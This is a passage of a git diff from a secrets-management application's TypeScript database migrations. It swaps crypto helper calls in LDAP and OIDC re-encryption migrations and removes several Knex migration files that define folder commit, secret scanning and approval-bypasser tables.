|
||||
|
||||
const key = crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
const key = infisicalSymmetricDecrypt({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
|
||||
const decryptedBindDN =
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedBindDN && el.bindDNIV && el.bindDNTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.bindDNIV,
|
||||
@ -260,9 +245,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedBindPass && el.bindPassIV && el.bindPassTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.bindPassIV,
|
||||
@ -279,9 +263,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedCACert && el.caCertIV && el.caCertTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.caCertIV,
|
||||
@ -354,8 +337,7 @@ const reencryptOidcConfig = async (knex: Knex) => {
|
||||
}
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
const orgEncryptionRingBuffer =
|
||||
@ -386,24 +368,19 @@ const reencryptOidcConfig = async (knex: Knex) => {
|
||||
);
|
||||
orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
|
||||
}
|
||||
|
||||
const key = crypto
|
||||
.encryption()
|
||||
.symmetric()
|
||||
.decryptWithRootEncryptionKey({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
const key = infisicalSymmetricDecrypt({
|
||||
ciphertext: encryptedSymmetricKey,
|
||||
iv: symmetricKeyIV,
|
||||
tag: symmetricKeyTag,
|
||||
keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
|
||||
});
|
||||
|
||||
const decryptedClientId =
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedClientId && el.clientIdIV && el.clientIdTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.clientIdIV,
|
||||
@ -420,9 +397,8 @@ const reencryptOidcConfig = async (knex: Knex) => {
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
el.encryptedClientSecret && el.clientSecretIV && el.clientSecretTag
|
||||
? crypto.encryption().symmetric().decrypt({
|
||||
? decryptSymmetric({
|
||||
key,
|
||||
keySize: SymmetricKeySize.Bits256,
|
||||
// eslint-disable-next-line @typescript-eslint/ban-ts-comment
|
||||
// @ts-ignore This will be removed in next cycle so ignore the ts missing error
|
||||
iv: el.clientSecretIV,
|
||||
|
@ -1,166 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
|
||||
if (!hasFolderCommitTable) {
|
||||
await knex.schema.createTable(TableName.FolderCommit, (t) => {
|
||||
t.uuid("id").primary().defaultTo(knex.fn.uuid());
|
||||
t.bigIncrements("commitId");
|
||||
t.jsonb("actorMetadata").notNullable();
|
||||
t.string("actorType").notNullable();
|
||||
t.string("message");
|
||||
t.uuid("folderId").notNullable();
|
||||
t.uuid("envId").notNullable();
|
||||
t.foreign("envId").references("id").inTable(TableName.Environment).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
|
||||
t.index("folderId");
|
||||
t.index("envId");
|
||||
});
|
||||
}
|
||||
|
||||
const hasFolderCommitChangesTable = await knex.schema.hasTable(TableName.FolderCommitChanges);
|
||||
if (!hasFolderCommitChangesTable) {
|
||||
await knex.schema.createTable(TableName.FolderCommitChanges, (t) => {
|
||||
t.uuid("id").primary().defaultTo(knex.fn.uuid());
|
||||
t.uuid("folderCommitId").notNullable();
|
||||
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
|
||||
t.string("changeType").notNullable();
|
||||
t.boolean("isUpdate").notNullable().defaultTo(false);
|
||||
t.uuid("secretVersionId");
|
||||
t.foreign("secretVersionId").references("id").inTable(TableName.SecretVersionV2).onDelete("CASCADE");
|
||||
t.uuid("folderVersionId");
|
||||
t.foreign("folderVersionId").references("id").inTable(TableName.SecretFolderVersion).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
|
||||
t.index("folderCommitId");
|
||||
t.index("secretVersionId");
|
||||
t.index("folderVersionId");
|
||||
});
|
||||
}
|
||||
|
||||
const hasFolderCheckpointTable = await knex.schema.hasTable(TableName.FolderCheckpoint);
|
||||
if (!hasFolderCheckpointTable) {
|
||||
await knex.schema.createTable(TableName.FolderCheckpoint, (t) => {
|
||||
t.uuid("id").primary().defaultTo(knex.fn.uuid());
|
||||
t.uuid("folderCommitId").notNullable();
|
||||
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
|
||||
t.index("folderCommitId");
|
||||
});
|
||||
}
|
||||
|
||||
const hasFolderCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderCheckpointResources);
|
||||
if (!hasFolderCheckpointResourcesTable) {
|
||||
await knex.schema.createTable(TableName.FolderCheckpointResources, (t) => {
|
||||
t.uuid("id").primary().defaultTo(knex.fn.uuid());
|
||||
t.uuid("folderCheckpointId").notNullable();
|
||||
t.foreign("folderCheckpointId").references("id").inTable(TableName.FolderCheckpoint).onDelete("CASCADE");
|
||||
t.uuid("secretVersionId");
|
||||
t.foreign("secretVersionId").references("id").inTable(TableName.SecretVersionV2).onDelete("CASCADE");
|
||||
t.uuid("folderVersionId");
|
||||
t.foreign("folderVersionId").references("id").inTable(TableName.SecretFolderVersion).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
|
||||
t.index("folderCheckpointId");
|
||||
t.index("secretVersionId");
|
||||
t.index("folderVersionId");
|
||||
});
|
||||
}
|
||||
|
||||
const hasFolderTreeCheckpointTable = await knex.schema.hasTable(TableName.FolderTreeCheckpoint);
|
||||
if (!hasFolderTreeCheckpointTable) {
|
||||
await knex.schema.createTable(TableName.FolderTreeCheckpoint, (t) => {
|
||||
t.uuid("id").primary().defaultTo(knex.fn.uuid());
|
||||
t.uuid("folderCommitId").notNullable();
|
||||
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
|
||||
t.index("folderCommitId");
|
||||
});
|
||||
}
|
||||
|
||||
const hasFolderTreeCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderTreeCheckpointResources);
|
||||
if (!hasFolderTreeCheckpointResourcesTable) {
|
||||
await knex.schema.createTable(TableName.FolderTreeCheckpointResources, (t) => {
|
||||
t.uuid("id").primary().defaultTo(knex.fn.uuid());
|
||||
t.uuid("folderTreeCheckpointId").notNullable();
|
||||
t.foreign("folderTreeCheckpointId").references("id").inTable(TableName.FolderTreeCheckpoint).onDelete("CASCADE");
|
||||
t.uuid("folderId").notNullable();
|
||||
t.uuid("folderCommitId").notNullable();
|
||||
t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
|
||||
t.index("folderTreeCheckpointId");
|
||||
t.index("folderId");
|
||||
t.index("folderCommitId");
|
||||
});
|
||||
}
|
||||
|
||||
if (!hasFolderCommitTable) {
|
||||
await createOnUpdateTrigger(knex, TableName.FolderCommit);
|
||||
}
|
||||
|
||||
if (!hasFolderCommitChangesTable) {
|
||||
await createOnUpdateTrigger(knex, TableName.FolderCommitChanges);
|
||||
}
|
||||
|
||||
if (!hasFolderCheckpointTable) {
|
||||
await createOnUpdateTrigger(knex, TableName.FolderCheckpoint);
|
||||
}
|
||||
|
||||
if (!hasFolderCheckpointResourcesTable) {
|
||||
await createOnUpdateTrigger(knex, TableName.FolderCheckpointResources);
|
||||
}
|
||||
|
||||
if (!hasFolderTreeCheckpointTable) {
|
||||
await createOnUpdateTrigger(knex, TableName.FolderTreeCheckpoint);
|
||||
}
|
||||
|
||||
if (!hasFolderTreeCheckpointResourcesTable) {
|
||||
await createOnUpdateTrigger(knex, TableName.FolderTreeCheckpointResources);
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasFolderCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderCheckpointResources);
|
||||
const hasFolderTreeCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderTreeCheckpointResources);
|
||||
const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
|
||||
const hasFolderCommitChangesTable = await knex.schema.hasTable(TableName.FolderCommitChanges);
|
||||
const hasFolderTreeCheckpointTable = await knex.schema.hasTable(TableName.FolderTreeCheckpoint);
|
||||
const hasFolderCheckpointTable = await knex.schema.hasTable(TableName.FolderCheckpoint);
|
||||
|
||||
if (hasFolderTreeCheckpointResourcesTable) {
|
||||
await dropOnUpdateTrigger(knex, TableName.FolderTreeCheckpointResources);
|
||||
await knex.schema.dropTableIfExists(TableName.FolderTreeCheckpointResources);
|
||||
}
|
||||
|
||||
if (hasFolderCheckpointResourcesTable) {
|
||||
await dropOnUpdateTrigger(knex, TableName.FolderCheckpointResources);
|
||||
await knex.schema.dropTableIfExists(TableName.FolderCheckpointResources);
|
||||
}
|
||||
|
||||
if (hasFolderTreeCheckpointTable) {
|
||||
await dropOnUpdateTrigger(knex, TableName.FolderTreeCheckpoint);
|
||||
await knex.schema.dropTableIfExists(TableName.FolderTreeCheckpoint);
|
||||
}
|
||||
|
||||
if (hasFolderCheckpointTable) {
|
||||
await dropOnUpdateTrigger(knex, TableName.FolderCheckpoint);
|
||||
await knex.schema.dropTableIfExists(TableName.FolderCheckpoint);
|
||||
}
|
||||
|
||||
if (hasFolderCommitChangesTable) {
|
||||
await dropOnUpdateTrigger(knex, TableName.FolderCommitChanges);
|
||||
await knex.schema.dropTableIfExists(TableName.FolderCommitChanges);
|
||||
}
|
||||
|
||||
if (hasFolderCommitTable) {
|
||||
await dropOnUpdateTrigger(knex, TableName.FolderCommit);
|
||||
await knex.schema.dropTableIfExists(TableName.FolderCommit);
|
||||
}
|
||||
}
|
@ -4,7 +4,6 @@ import { inMemoryKeyStore } from "@app/keystore/memory";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { initLogger } from "@app/lib/logger";
|
||||
import { KmsDataKey } from "@app/services/kms/kms-types";
|
||||
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
import { getMigrationEnvConfig } from "./utils/env-config";
|
||||
@ -40,8 +39,7 @@ export async function up(knex: Knex): Promise<void> {
|
||||
);
|
||||
|
||||
initLogger();
|
||||
const superAdminDAL = superAdminDALFactory(knex);
|
||||
const envConfig = await getMigrationEnvConfig(superAdminDAL);
|
||||
const envConfig = getMigrationEnvConfig();
|
||||
const keyStore = inMemoryKeyStore();
|
||||
const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
|
||||
|
||||
|
@ -1,107 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "@app/db/schemas";
|
||||
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "@app/db/utils";
|
||||
import {
|
||||
SecretScanningFindingStatus,
|
||||
SecretScanningScanStatus
|
||||
} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
if (!(await knex.schema.hasTable(TableName.SecretScanningDataSource))) {
|
||||
await knex.schema.createTable(TableName.SecretScanningDataSource, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
t.string("externalId").index(); // if we need a unique way of identifying this data source from an external resource
|
||||
t.string("name", 48).notNullable();
|
||||
t.string("description");
|
||||
t.string("type").notNullable();
|
||||
t.jsonb("config").notNullable();
|
||||
t.binary("encryptedCredentials"); // webhook credentials, etc.
|
||||
t.uuid("connectionId");
|
||||
t.boolean("isAutoScanEnabled").defaultTo(true);
|
||||
t.foreign("connectionId").references("id").inTable(TableName.AppConnection);
|
||||
t.string("projectId").notNullable();
|
||||
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
t.boolean("isDisconnected").notNullable().defaultTo(false);
|
||||
t.unique(["projectId", "name"]);
|
||||
});
|
||||
await createOnUpdateTrigger(knex, TableName.SecretScanningDataSource);
|
||||
}
|
||||
|
||||
if (!(await knex.schema.hasTable(TableName.SecretScanningResource))) {
|
||||
await knex.schema.createTable(TableName.SecretScanningResource, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
t.string("externalId").notNullable();
|
||||
t.string("name").notNullable();
|
||||
t.string("type").notNullable();
|
||||
t.uuid("dataSourceId").notNullable();
|
||||
t.foreign("dataSourceId").references("id").inTable(TableName.SecretScanningDataSource).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
t.unique(["dataSourceId", "externalId"]);
|
||||
});
|
||||
await createOnUpdateTrigger(knex, TableName.SecretScanningResource);
|
||||
}
|
||||
|
||||
if (!(await knex.schema.hasTable(TableName.SecretScanningScan))) {
|
||||
await knex.schema.createTable(TableName.SecretScanningScan, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
t.string("status").notNullable().defaultTo(SecretScanningScanStatus.Queued);
|
||||
t.string("statusMessage", 1024);
|
||||
t.string("type").notNullable();
|
||||
t.uuid("resourceId").notNullable();
|
||||
t.foreign("resourceId").references("id").inTable(TableName.SecretScanningResource).onDelete("CASCADE");
|
||||
t.timestamp("createdAt").defaultTo(knex.fn.now());
|
||||
});
|
||||
}
|
||||
|
||||
if (!(await knex.schema.hasTable(TableName.SecretScanningFinding))) {
|
||||
await knex.schema.createTable(TableName.SecretScanningFinding, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
t.string("dataSourceName").notNullable();
|
||||
t.string("dataSourceType").notNullable();
|
||||
t.string("resourceName").notNullable();
|
||||
t.string("resourceType").notNullable();
|
||||
t.string("rule").notNullable();
|
||||
t.string("severity").notNullable();
|
||||
t.string("status").notNullable().defaultTo(SecretScanningFindingStatus.Unresolved);
|
||||
t.string("remarks");
|
||||
t.string("fingerprint").notNullable();
|
||||
t.jsonb("details").notNullable();
|
||||
t.string("projectId").notNullable();
|
||||
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
|
||||
t.uuid("scanId");
|
||||
t.foreign("scanId").references("id").inTable(TableName.SecretScanningScan).onDelete("SET NULL");
|
||||
t.timestamps(true, true, true);
|
||||
t.unique(["projectId", "fingerprint"]);
|
||||
});
|
||||
await createOnUpdateTrigger(knex, TableName.SecretScanningFinding);
|
||||
}
|
||||
|
||||
if (!(await knex.schema.hasTable(TableName.SecretScanningConfig))) {
|
||||
await knex.schema.createTable(TableName.SecretScanningConfig, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
t.string("projectId").notNullable().unique();
|
||||
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
|
||||
t.string("content", 5000);
|
||||
t.timestamps(true, true, true);
|
||||
});
|
||||
await createOnUpdateTrigger(knex, TableName.SecretScanningConfig);
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
await knex.schema.dropTableIfExists(TableName.SecretScanningFinding);
|
||||
|
||||
await dropOnUpdateTrigger(knex, TableName.SecretScanningFinding);
|
||||
await knex.schema.dropTableIfExists(TableName.SecretScanningScan);
|
||||
|
||||
await knex.schema.dropTableIfExists(TableName.SecretScanningResource);
|
||||
await dropOnUpdateTrigger(knex, TableName.SecretScanningResource);
|
||||
|
||||
await knex.schema.dropTableIfExists(TableName.SecretScanningDataSource);
|
||||
await dropOnUpdateTrigger(knex, TableName.SecretScanningDataSource);
|
||||
|
||||
await knex.schema.dropTableIfExists(TableName.SecretScanningConfig);
|
||||
await dropOnUpdateTrigger(knex, TableName.SecretScanningConfig);
|
||||
}
|
@ -1,48 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
if (!(await knex.schema.hasTable(TableName.AccessApprovalPolicyBypasser))) {
|
||||
await knex.schema.createTable(TableName.AccessApprovalPolicyBypasser, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
|
||||
t.uuid("bypasserGroupId").nullable();
|
||||
t.foreign("bypasserGroupId").references("id").inTable(TableName.Groups).onDelete("CASCADE");
|
||||
|
||||
t.uuid("bypasserUserId").nullable();
|
||||
t.foreign("bypasserUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");
|
||||
|
||||
t.uuid("policyId").notNullable();
|
||||
t.foreign("policyId").references("id").inTable(TableName.AccessApprovalPolicy).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
});
|
||||
await createOnUpdateTrigger(knex, TableName.AccessApprovalPolicyBypasser);
|
||||
}
|
||||
|
||||
if (!(await knex.schema.hasTable(TableName.SecretApprovalPolicyBypasser))) {
|
||||
await knex.schema.createTable(TableName.SecretApprovalPolicyBypasser, (t) => {
|
||||
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
|
||||
|
||||
t.uuid("bypasserGroupId").nullable();
|
||||
t.foreign("bypasserGroupId").references("id").inTable(TableName.Groups).onDelete("CASCADE");
|
||||
|
||||
t.uuid("bypasserUserId").nullable();
|
||||
t.foreign("bypasserUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");
|
||||
|
||||
t.uuid("policyId").notNullable();
|
||||
t.foreign("policyId").references("id").inTable(TableName.SecretApprovalPolicy).onDelete("CASCADE");
|
||||
t.timestamps(true, true, true);
|
||||
});
|
||||
await createOnUpdateTrigger(knex, TableName.SecretApprovalPolicyBypasser);
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
await knex.schema.dropTableIfExists(TableName.SecretApprovalPolicyBypasser);
|
||||
await knex.schema.dropTableIfExists(TableName.AccessApprovalPolicyBypasser);
|
||||
|
||||
await dropOnUpdateTrigger(knex, TableName.SecretApprovalPolicyBypasser);
|
||||
await dropOnUpdateTrigger(knex, TableName.AccessApprovalPolicyBypasser);
|
||||
}
|
@ -1,21 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.DynamicSecret, "usernameTemplate");
|
||||
if (!hasColumn) {
|
||||
await knex.schema.alterTable(TableName.DynamicSecret, (t) => {
|
||||
t.string("usernameTemplate").nullable();
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasColumn = await knex.schema.hasColumn(TableName.DynamicSecret, "usernameTemplate");
|
||||
if (hasColumn) {
|
||||
await knex.schema.alterTable(TableName.DynamicSecret, (t) => {
|
||||
t.dropColumn("usernameTemplate");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,19 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
if (!(await knex.schema.hasColumn(TableName.SecretFolderVersion, "description"))) {
|
||||
await knex.schema.alterTable(TableName.SecretFolderVersion, (t) => {
|
||||
t.string("description").nullable();
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
if (await knex.schema.hasColumn(TableName.SecretFolderVersion, "description")) {
|
||||
await knex.schema.alterTable(TableName.SecretFolderVersion, (t) => {
|
||||
t.dropColumn("description");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,24 +0,0 @@
|
||||
import slugify from "@sindresorhus/slugify";
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { alphaNumericNanoId } from "@app/lib/nanoid";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasNameCol = await knex.schema.hasColumn(TableName.CertificateTemplate, "name");
|
||||
if (hasNameCol) {
|
||||
const templates = await knex(TableName.CertificateTemplate).select("id", "name");
|
||||
await Promise.all(
|
||||
templates.map((el) => {
|
||||
const slugifiedName = el.name
|
||||
? slugify(`${el.name.slice(0, 16)}-${alphaNumericNanoId(8)}`)
|
||||
: slugify(alphaNumericNanoId(12));
|
||||
|
||||
return knex(TableName.CertificateTemplate).where({ id: el.id }).update({ name: slugifiedName });
|
||||
})
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(): Promise<void> {}
|
@ -1,63 +0,0 @@
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { ApprovalStatus } from "@app/ee/services/secret-approval-request/secret-approval-request-types";
|
||||
|
||||
import { TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
const hasPrivilegeDeletedAtColumn = await knex.schema.hasColumn(
|
||||
TableName.AccessApprovalRequest,
|
||||
"privilegeDeletedAt"
|
||||
);
|
||||
const hasStatusColumn = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "status");
|
||||
|
||||
if (!hasPrivilegeDeletedAtColumn) {
|
||||
await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
|
||||
t.timestamp("privilegeDeletedAt").nullable();
|
||||
});
|
||||
}
|
||||
|
||||
if (!hasStatusColumn) {
|
||||
await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
|
||||
t.string("status").defaultTo(ApprovalStatus.PENDING).notNullable();
|
||||
});
|
||||
|
||||
// Update existing rows based on business logic
|
||||
// If privilegeId is not null, set status to "approved"
|
||||
await knex(TableName.AccessApprovalRequest).whereNotNull("privilegeId").update({ status: ApprovalStatus.APPROVED });
|
||||
|
||||
// If privilegeId is null and there's a rejected reviewer, set to "rejected"
|
||||
const rejectedRequestIds = await knex(TableName.AccessApprovalRequestReviewer)
|
||||
.select("requestId")
|
||||
.where("status", "rejected")
|
||||
.distinct()
|
||||
.pluck("requestId");
|
||||
|
||||
if (rejectedRequestIds.length > 0) {
|
||||
await knex(TableName.AccessApprovalRequest)
|
||||
.whereNull("privilegeId")
|
||||
.whereIn("id", rejectedRequestIds)
|
||||
.update({ status: ApprovalStatus.REJECTED });
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
export async function down(knex: Knex): Promise<void> {
|
||||
const hasPrivilegeDeletedAtColumn = await knex.schema.hasColumn(
|
||||
TableName.AccessApprovalRequest,
|
||||
"privilegeDeletedAt"
|
||||
);
|
||||
const hasStatusColumn = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "status");
|
||||
|
||||
if (hasPrivilegeDeletedAtColumn) {
|
||||
await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
|
||||
t.dropColumn("privilegeDeletedAt");
|
||||
});
|
||||
}
|
||||
|
||||
if (hasStatusColumn) {
|
||||
await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
|
||||
t.dropColumn("status");
|
||||
});
|
||||
}
|
||||
}
|
@ -1,139 +0,0 @@
|
||||
/* eslint-disable no-await-in-loop */
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { chunkArray } from "@app/lib/fn";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { logger } from "@app/lib/logger";
|
||||
|
||||
import { SecretType, TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
logger.info("Starting secret version fix migration");
|
||||
|
||||
// Get all shared secret IDs first to optimize versions query
|
||||
const secretIds = await knex(TableName.SecretV2)
|
||||
.where("type", SecretType.Shared)
|
||||
.select("id")
|
||||
.then((rows) => rows.map((row) => row.id));
|
||||
|
||||
logger.info(`Found ${secretIds.length} shared secrets to process`);
|
||||
|
||||
if (secretIds.length === 0) {
|
||||
logger.info("No shared secrets found");
|
||||
return;
|
||||
}
|
||||
|
||||
const secretIdChunks = chunkArray(secretIds, 5000);
|
||||
|
||||
for (let chunkIndex = 0; chunkIndex < secretIdChunks.length; chunkIndex += 1) {
|
||||
const currentSecretIds = secretIdChunks[chunkIndex];
|
||||
logger.info(`Processing chunk ${chunkIndex + 1} of ${secretIdChunks.length}`);
|
||||
|
||||
// Get secrets and versions for current chunk
|
||||
const [sharedSecrets, allVersions] = await Promise.all([
|
||||
knex(TableName.SecretV2).whereIn("id", currentSecretIds).select(selectAllTableCols(TableName.SecretV2)),
|
||||
knex(TableName.SecretVersionV2).whereIn("secretId", currentSecretIds).select("secretId", "version")
|
||||
]);
|
||||
|
||||
const versionsBySecretId = new Map<string, number[]>();
|
||||
|
||||
allVersions.forEach((v) => {
|
||||
const versions = versionsBySecretId.get(v.secretId);
|
||||
if (versions) {
|
||||
versions.push(v.version);
|
||||
} else {
|
||||
versionsBySecretId.set(v.secretId, [v.version]);
|
||||
}
|
||||
});
|
||||
|
||||
const versionsToAdd = [];
|
||||
const secretsToUpdate = [];
|
||||
|
||||
// Process each shared secret
|
||||
for (const secret of sharedSecrets) {
|
||||
const existingVersions = versionsBySecretId.get(secret.id) || [];
|
||||
|
||||
if (existingVersions.length === 0) {
|
||||
// No versions exist - add current version
|
||||
versionsToAdd.push({
|
||||
secretId: secret.id,
|
||||
version: secret.version,
|
||||
key: secret.key,
|
||||
encryptedValue: secret.encryptedValue,
|
||||
encryptedComment: secret.encryptedComment,
|
||||
reminderNote: secret.reminderNote,
|
||||
reminderRepeatDays: secret.reminderRepeatDays,
|
||||
skipMultilineEncoding: secret.skipMultilineEncoding,
|
||||
metadata: secret.metadata,
|
||||
folderId: secret.folderId,
|
||||
actorType: "platform"
|
||||
});
|
||||
} else {
|
||||
const latestVersion = Math.max(...existingVersions);
|
||||
|
||||
if (latestVersion !== secret.version) {
|
||||
// Latest version doesn't match - create new version and update secret
|
||||
const nextVersion = latestVersion + 1;
|
||||
|
||||
versionsToAdd.push({
|
||||
secretId: secret.id,
|
||||
version: nextVersion,
|
||||
key: secret.key,
|
||||
encryptedValue: secret.encryptedValue,
|
||||
encryptedComment: secret.encryptedComment,
|
||||
reminderNote: secret.reminderNote,
|
||||
reminderRepeatDays: secret.reminderRepeatDays,
|
||||
skipMultilineEncoding: secret.skipMultilineEncoding,
|
||||
metadata: secret.metadata,
|
||||
folderId: secret.folderId,
|
||||
actorType: "platform"
|
||||
});
|
||||
|
||||
secretsToUpdate.push({
|
||||
id: secret.id,
|
||||
newVersion: nextVersion
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
logger.info(
|
||||
`Chunk ${chunkIndex + 1}: Adding ${versionsToAdd.length} versions, updating ${secretsToUpdate.length} secrets`
|
||||
);
|
||||
|
||||
// Batch insert new versions
|
||||
if (versionsToAdd.length > 0) {
|
||||
const insertBatches = chunkArray(versionsToAdd, 9000);
|
||||
for (let i = 0; i < insertBatches.length; i += 1) {
|
||||
await knex.batchInsert(TableName.SecretVersionV2, insertBatches[i]);
|
||||
}
|
||||
}
|
||||
|
||||
